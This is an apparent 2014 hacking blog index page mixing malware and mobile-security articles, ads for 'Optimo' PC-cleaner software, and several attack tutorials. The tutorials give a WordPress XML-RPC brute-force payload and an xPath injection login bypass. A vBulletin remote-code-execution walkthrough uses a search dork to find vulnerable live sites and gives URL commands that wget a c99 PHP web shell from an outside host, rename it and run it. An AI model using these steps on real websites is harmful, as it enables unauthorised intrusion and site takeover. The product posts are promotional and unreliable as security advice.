Latest Post
Sign up for FREE daily Updates.

Mobile security infestation [Infographics]

The explosion in popularity of mobile devices has changed the way that people go about their daily lives. Their reliance on the efficiency and speed of these gadgets has made location--often--irrelevant. However, with the reliance comes risk; the number of viruses and hackers lurking for unencrypted data has risen dramatically over the past few years, a number closely related to the rise in smartphone and tablet usage over that same period of time.


This infographic, provided by TollFreeForwarding.com, is an interesting look at mobile security, how it is being exploited, and the future of safe usage on mobile devices.is an interesting look at mobile security, how it is being exploited, and the future of safe usage on mobile devices.

 Russel Cooke is a journalist based in Louisville, KY. His love of technology often drives his stories, which also center around social media, content creation, and marketing. You can follow him on Twitter @RusselCooke2.



 

Wordpress XML-RPC Brute Force Attack Vulnerability

Today i'll be sharing a easy & quite  interesting tutorial on Wordpress XML-RPC Brute Force Attack.
As we all know nowadays when every an attacker gets his hands on a WordPress website, the first thing he would try to do in order to compromise the website is a brute force attack. The attacker loads a list of user & password combination in order to guess the correct one. Its always the first & mandatory option to try in point of view of a newbie attacker. The result of an increase in brute force attack day buy day, the developers have started using Login captcha plugins to protect them selves form such attack.


XML-RPC is a word press interface & this functionality is turned by default since WordPress 3.5. Recently we have seen very critical vulnerability been found in the same which effected a quarter of the internet - Ping Back DDOS Vulnerability, Arbitrary code Execution etc. Recently it has came to known that attackers are taking advent of the XML-RPC wp.getUsersBlogs method in order to launch a brute force attack against the website. In XML-RPC many of the calls need the credentials in order to implement. Then attacker can try different combinations on user & passwords. The output is thrown on the webpage weather its valid or invalid.



Step by step guide -



 - Locate the XMLRPC on the target website - localhost/xmlrpc.php


















- Send a POST request with the following code given below.

<methodCall><methodName>wp.getUsersBlogs</methodName><params><param><value> <string>user</string></value></param>  <param><value><string>password</string></value></param></params></methodCall>












- Check the response

If wrong combination - faultCode


  


If right - isAdmin









Hope you all liked this tutorial.  Any queries? Drop it down in comments!.


 

Malware: How we are Infected [InfoGraphic]

So you have a computer, but if it was infected with a virus, what would you do? Would you even know it was there? It is a well-known fact that over 32% of all computers in the world have malware of some sort. Today we will be talking about the infamous computer virus and what it is.

So let's start with something you all have probably heard of, Malware. Malware is a program made to infiltrate your computer, disable parts of it, and thus gain access to your hard drive, search history and such to aid with stealing information. However, there are other types of malware out there. Let's get to know them and how much of the 32% they infect.

At 57%, first we have the virus. This is a software that has the capability to copy itself and send itself into other folders. Then there is the "Trojan" at 21%. The Trojan is malicious software that hides on the internet disguised as some sort of program or free item, and ce you download it, you will soon discover it is malicious. But the Trojan has a brother at 7%, called the "Trojan Downloader". This type of virus does the same thing as the simple Trojan, but once on your computer it downloads more viruses and software, then begins to use those programs.

Then at 3% there is the "Exploit", which finds a glitch, bug or system error and uses that to hack into your computer. Next we have the "Worm" at 2%, this malicious bug works the same as a Trojan, but then copies and pastes itself across your computer network.

But not all viruses seem so bad when you get them, for instance the "Adware" at 3%. This type of virus infects your computer so nothing happens at first, but once you log into your web browser, then immediately your screen will be flooded with ads. There is also the "Monitoring Tool" with 2% of the 32% infected. This malware infects your computer and hides, not doing anything but monitoring your activity, (Search history, keyboard history etc.) and then sends those back to a remote server.

There is also one of the worst at 1%, the "Back Door". This virus infects your computer remotely, not allowing your anti-virus security to even detect it, but sure enough it does. And lastly we have one of the worst but luckily at a low percentage of 0.01%, "Spyware". This diabolically designed software infects your computer and takes the most important pieces of information it can find and sends it back to wherever it came from. This information is generally passwords, credit card numbers and other sensitive information.
All of these viruses have devastating effects. Last year there were 27 million strains of malware made, which means 74,000 new viruses are created every day. The number of homes in the United States that experience spam is 24 million. The number of homes with serious viruses in the last 2 years is 16 million, and the number of houses that had spyware in the last 6 months is 6 million. But most devastating of all, over 1 million of all homes have lost money to spyware in the last year. Another devastating fact is that Viruses cost the world 4.55 billion USD every year.

So be safe, don't download anything you are unsure of, and be sure to have an anti-virus software. But most importantly learn how to detect these programs when you get them.






















 

Follow The Following Steps To Make Facebook Page With No Name,



    1) First of all, click here to create your new Facebook page.


    2) Select a Category. Example- Entertainment and after that choose a category.

       3) Copy the code inside the brackets [ ᠌᠌᠌᠌᠌] and paste in the name field.
     4) Click on I agree to Facebook Pages Terms and then Get Stated And All Done You Can    See A Page With No Name Is Created 


 

iOS Update Quashes Dangerous SSL Bug

5497202855_bbbca2a000_o.jpg

Photo by: Duncan Hull


If you haven't gotten the iOS 7.0.6 update, you need to stop what you're doing and get it now. There's a dangerous SSL bug that can hurt you in numerous ways if you don't take care of it right away by updating your Apple operating system. Even if you have an older version, you're going to want to make sure you're protected and have the latest OS available for your particular mobile device.


Back in February of this year, it came out that not updating could lead to bad people being able to read and modify encrypted communications whether people were using iPhones, iPads or other iOS devices. As you might imagine, this upset a lot of people. The good news is that Apple was pretty quick at making sure an update was available for people who downloaded it.


And yet that's part of the problem - not everyone updates their operating system on their own, especially on their phone or mobile device. Some people have claimed that it wasn't a flaw and was built-in iOS as a means for people - like the NSA perhaps - to be able to spy on people easier. Apple denied the claims, of course, but if you Google around, you're going to find some interesting speculation about the "flaw" found in iOS.


According to Ars Technica, the problem may have gone beyond iOS mobile devices and actually affected Mac OS X users - even if they had all the current patches and updates installed! According to them, "[The] vulnerability has been confirmed in iOS versions 6.1.5, 7.0.4, and 7.0.5, and OS X 10.9.0 and 10.9.1." That's quite a wide vulnerability. And while Apple seemed to be working fast to squash the bug last month, there's a good chance that a lot of people still don't have it patched.


In order to make sure you stay safe, here are some specific tips you should follow.


  • Always Update - The first thing you want to do is make sure you ALWAYS update your OS when you find out there's a new version available.
  • Be Aware - In order to know when you should update your OS, you're going to make sure you're aware of major problems that have been found.
  • Act Quickly - The sooner you patch the vulnerable code, the sooner you're going to be safe from attacks.


While there's no guarantee your mobile devices are going to be safe and secure, you want to make sure you take whatever steps you can to guarantee that you're as safe as possible. If you have any thoughts or opinions about the latest iOS update that killed some major security flaws, feel free to leave a comment below and let us know what you're thinking.


Guest Post:

Written by: Jenny Corteza has used a City Directory Theme because it made her life as a writer a whole lot easier. She's been writing technology articles for many years now.
 

WhatsApp spam used by ASProx Botnet to Deliver Kuluoz Malware

5448944597_8e70da64ab_o.png

Photo by: Sean MacEntee




As you probably know, Facebook bought WhatsApp for an obscene amount of money in stock earlier this year. What you might not know is that there's a lot of WhatsApp spam that is being used by ASProx Botnet to deliver nasty Kuluoz malware to unsuspecting  users. This is not good news any way you look at the situation. Keep reading if you want to know more about this as well as what you should do to stay safe.


Here's a look at some of the dates when the WhatsApp problem has made Malcovery's "Today's Top Threats" list.


  1. SEPTEMBER 19, 23, 24, 25, 26
  2. OCTOBER 2, 3, 4, 7, 8, 9, 10, 11, 16, 17, 18, 21, 22, 23, 24, 25
  3. NOVEMBER 14
  4. JANUARY 9, 13, 15, 20, 28


Looking at that list, it's easy to start wondering why nothing has been done sooner about the problem. Additionally, it really makes you wonder why Facebook paid so much for the company by offering them stock options.


Going back to November of last year, ComputerWorld published an article about how WhatsApp was one of the top five brands imitated to deliver malware with spam. That's quite a bit of recognition - and not in a good way.


Here's a look at some specific ways you can stay safe and avoid Kuluoz and other malware.

  • Use Protection - The very first thing you want to do is make sure you're using some type of protection. The good news is that you don't need to spend a lot of money to get decent anti-virus software these days.
  • Update Protection - Having protection software is nice, but if you never update it at all, you're going to find that there's still a high chance your computer will get infected and quit working correctly.
  • Be Suspicious - If you're not sure of something online, you want to err on the side of caution and not take any unnecessary risks. Even with a brand like WhatsApp - that's connected to Facebook now - you want to be very careful and know what you're doing.
  • Educate Yourself - Last but most certainly not least, you should make an effort to stay informed about how malware works and the steps you can take to protect yourself from it whenever possible. This is really the best way you can make sure your computer stays safe and virus free.


Following the advice above, there's a good chance you'll be able to avoid WhatsApp spam and not get infected with Kuluoz malware. Still, it's a good idea to pay attention and update your anti-virus software all the time. If you have any experience with WhatsApp that's negative, please leave us a comment below. 







Guest Post - 
 
Written by: Jenny Corteza deals with staff outsourcing all the time. She's a writer and dealing with editors and others can sometimes be a problem. Still, she loves writing articles about technology. Go figure.





 

What is xPath Injection? How to exploit with xPath? [Part 1]

xPath Injection occurs when inputs supplied by the users are not properly sanitized and a malicious attacker is able to send and construct a malformed xPath query for XML data with the intention to extract sensitive information to which normal users don't have access to. It is similar to SQL Injection where attackers does the same, in SQL Injection, SQL queries are made and in xPath Injection, xPath queries are made for XML data/. Queries XML is done through xPath which is type of a simple descriptive statements that allows XML query to locate certain information.

To understand more clearly how a XML document looks like, have a look below. It is a simple XML document codes to authenticate a user based upon the combination of username and password they entered.


<users>
<user>
<name>Administrator</name>
<username>hackingsec</username>
<password>password123!</password>
<admin>1</admin>
</user>
<user>
<name>Admin</name>
<username>admin</username>
<password>reddit12</password>
<admin>0</admin>
</user>
</users>
















When the username 'admin' and password 'reddit12' are entered, the following xPath query is executed

/*[0]/user[username=”admin” and
password=”reddit12”]

Which would return the following

<user>
<name>Admin</name>
<username>admin</username>
<password>reddit12</password>
<admin>0</admin>

</user>


Exploiting xPath Injection : Authentication Bypass

An malicious user can bypass the authentication by sending specially crafted input query.

/*[0]/user[username=”admin” and password=”reddit12”]

If an attacker submits the following malicious input:

username: admin" or "1" ="1
password: anything

the XPATH query which will be executed will be the following:

/*[0]/user[username=”admin" or "1"="1” and
password=”anything”]

The XPath query will result in authentication bypass and an attacker will be able to login to the
application as user "admin". This is because the OR clause in the XPath query is a condition which is always true. Under XPath (similar to SQL) the AND clause has precedence over the OR clause, so the XPath query will be evaluated as shown by the following pseudo-code:

username ="admin" or [TRUE AND False]
which will result in:
username ="admin" or FALSE

As the username admin is valid, the attacker will be able to login as this user.


That was a basic introduction to tell you, what xPath actually is and to exploit it. I will be dividing this post into 3 separate parts. This was the 1st part, in 2nd part I will be explaining how to extract database information through xPath Injection. In 3rd part we will be talking about some automated tools for exploiting xPath Injection.
 

What is Remote Code Execution? How to Hack Websites

According to Wikipedia, Remote Code Execution can be defined as “In computer security, arbitrary code execution or remote code execution is used to describe an attacker's ability to execute any commands of the attacker's choice on a target machine or in a target process. It is commonly used in arbitrary code execution vulnerability to describe a software bug that gives an attacker a way to execute arbitrary code. A program that is designed to exploit such vulnerability is called an arbitrary code execution exploit. Most of these vulnerabilities allow the execution of machine code and most exploits therefore inject and execute shell code to give an attacker an easy way to manually run arbitrary commands. The ability to trigger arbitrary code execution from one machine on another (especially via a wide-area network such as the Internet) is often referred to as remote code execution”

vBulletin RCE Injection

Few websites running vBulletin are vulnerable to Remote Code Execution, by exploiting the vulnerability we can get our PHP backdoor shell uploaded on the website. We’ll use a dork to find the vulnerable website.

Note: Don’t keep yourself restricted when it comes to using dorks, use other search engines too other than Google, like Bing, Yahoo etc. Use of multiple search engines will help you to get more vulnerable websites.

Dork: inurl:faq.php & intext:"Warning: system() [function.system]"

Now, select any website of your choice from th search result, and go to its faq.php page. If the website is vulnerable, you will get the following on the page.


You will get an error similar to Warning: system() [function.system]: Cannot execute a blank command in [path]/faq.php(324) : eval()'d code on line 1

So, firstly upload your PHP shell on any free hosting website or you can use sh3ll.org/c99.txt as it has already got an uploaded .txt shell. (We will be first uploading our shell in .txt form, and later will be changing the extension to .php after the upload process is completed.

Suppose the vulnerable website is http://www.vulnerable.com/faq.php. So in order to upload our shell enter the following in the URL bar:

http://www.vulnerable.com/faq.php?cmd=cd /tmp;wget http://sh3ll.org/c99.txt

To check if we were able to successfully upload our shell, enter the following in the URL bar 
http://www.vulnerable.com/faq.php?cmd=cd /tmp;ls -la c99.txt

Were c99.txt is the name of your uploaded shell. If we were successful in uploading our shell, we see the following text on the page. (Might be a little different in some cases)
-rw-r—r—1 nobody nobody

We know that our shell is successful uploaded on the website, now it’s time to change the file format from .txt to .php in order to execute it on the server.

http://www.vulnerable.com/faq.php?cmd=cd /tmp;mv c99.txt check.php
(You can change check.php to any other name of your choice)

Now, the file format is change. It’s time to execute our shell, so to execute it enter the following in the URL bar
http://www.vulnerable.com/faq.php?cmd=cd /tmp;mv c99.txt check.php
 

Bingo!! We successfully exploited vBulletin Remote Code Execution Vulnerability.

 

Technology and it's threat


Technology and its threat

It's true that technology makes everyone dance on its tone. Now we have computers with the help of which we can get information about everything. It has also changed the way of communication. Earlier we use to talk via letters and phones. But, now we have a webcam through which we can do video calling or conferencing. It's true that machines have been created by men, but they make fewer mistakes as compared to men. You just need to program the computer properly and it will work accurately. With the help of computer everything is done perfectly in less time. Now days it’s not surprising if students carry their laptop and mobile to school. Technology has truly made our lives easier.



But a computer also faces health issues, which can be treated by an Antivirus Software program.
Following are  top 8 threats and no one should ever ignore them

Viruses: - The name itself describes it. It can disrupt a computer and can damage the available data. Viruses can be received via numerous options that also include e-mail attachments. So, always beware when you get an e-mail from an unidentified server or person.

Spyware: - A Spyware is used to spy on computers. It can steal your personal information and send it to others who can misuse it. Today everyone is concerned about being the victim of identity theft. Spyware are generally attached to a freeware downloaded from the web. So be cautious when downloading and installing a software tool.

Spam: - Spam mails are promotional in nature and usually promote products of sexual or dubious nature. Some websites are harvested by spammers, from where they steal your e-mail ids.
Adware: - Adware are responsible for producing advertisements on a system without user’s consent, which you often see on your computer screen. It can be in the form of pop-ups, pop-under, and other sources. People generally do get irritated by these adware but at many times are not aware of its causes.

Dialers: - Dialers are the programs, which are designed to redirect phone calls to expensive numbers without even informing you. You’ll get to know about it, when you will receive the bill.
Hackers: - A computer always consists of so much personal data, including your bank and credit card details. Hackers always try to steal this data and recover your passwords in order to do malicious activities and even may burgle you.

Hijackers: - The hijackers take remote control of your computer screen and can reset your homepage and search pages. They do it in order to do thievery on your behalf so that they can be away from the agencies and you’ll be in danger.

Phishing: - Phishing has become the most threat full of all malicious activities over the internet. It is because Phishing websites look similar to the real websites, and are designed to make fools out of the customer and are generally scams to harvest usernames and passwords of prominent websites.

In order to be away from these 8 threats, download Security Software Optimo Defender, which also scans for threats and performs virus removal programs on a computer by offering various features like Antivirus,

Anti-Trojan, Anti-Spyware, and System Security Suite. There are a lot of Antivirus programs available on the internet, but like everything else they also vary in quality. You tend to get what you pay for.
Anna Asthesia is chief technical head in optimodefender.com & working from last 5 years. She likes to write article on antivirus software program, security software & how to find genuine online tech support for Laptops, Computers & Smartphones.

About the Author
Anna Asthesia is chief technial head in optimopro.com & working from last 5 years. She likes to write article on windows registry , computer problems & how to find genuine online tech support for Laptops, Computers & Smartphones.You can read her latest blogs onblog.optimopro.com


 

How To Speed Up Your Computer with Optimo Pro

Computer users are inundated with tribulations frequently. The way you eat food to keep you going and to keep you fit, likewise, computer machine also needs maintenance every now and then. Your body demands food to keep you going. So how can your computer lag behind? Computer optimization is the buzz word. Everyone wants to speed up computer to reap more benefits.

Regular holdups that stall the computer’s performance become a complete nuisance. Virus attacks, malware intrusions, Trojan horse, and other cruel problems slow down the speed of your system. But most of the users find it difficult to understand the problem and resolve them. What you require is good quality pc cleaner that deals with junk files, registry errors and much more.
Quite a few PC cleaners are doing the rounds in the market, some fake and some real. Fake ones rather than solving any setback embed a set of virus and infections that results in loss of time and money. Real ones effectively optimize your computer system that helps speed up computer.
Optimo Pro is software that comes with more than one program. They scan the computer within minutes and help the customer get back to work. Within months of its launch, Optimo Pro has had immense outreach and has helped computer users, be it consumers or business. The increased usage of Optimo Pro has been phenomenal.



What all it does?

  • Removes data footprints from at least 25 browsers
  • Protects your confidentiality
  • Wipes and cleanses up to 25 browsers like Google Chrome, Safari, Firefox
  • Takes care of the clutter that clogs the system
  • Features:
  • Windows Registry cleaner
  • Apps Errors cleaner
  • Files cleaner
  • Browser cleaner
  • Short cut cleaner
  • Trace cleaner
  • Registry Optimizer
  • Junk Files cleaner
  • PC Optimizer
  • Complete computer cleaning software



All these apps work in tandem with each other and help increase the speed of your PC. A PC cleaner acts a scrubber that scrubs manifold parts of the computer and helps keep it in good shape. Be it fixing your registry or cleaning junk files, it does all.
With the kind of success Optimo Pro has gathered, it becomes worthwhile to at least give it a try. Download Optimo Pro from www.optimopro.com  and make use of the trial version. Our customer service number is 1-800-413-1289. You can ask any question and we will be more than happy to serve you.

About the Author
Anna Asthesia is chief technial head in optimopro.com & working from last 5 years. She likes to write article on windows registry , computer problems & how to find genuine online tech support for Laptops, Computers & Smartphones.You can read her latest blogs on blog.optimopro.com

 
 
Support : Blog | Hacking-Sec | PHP-Sec
Copyright © 2014. Hacking-Sec - All Rights Reserved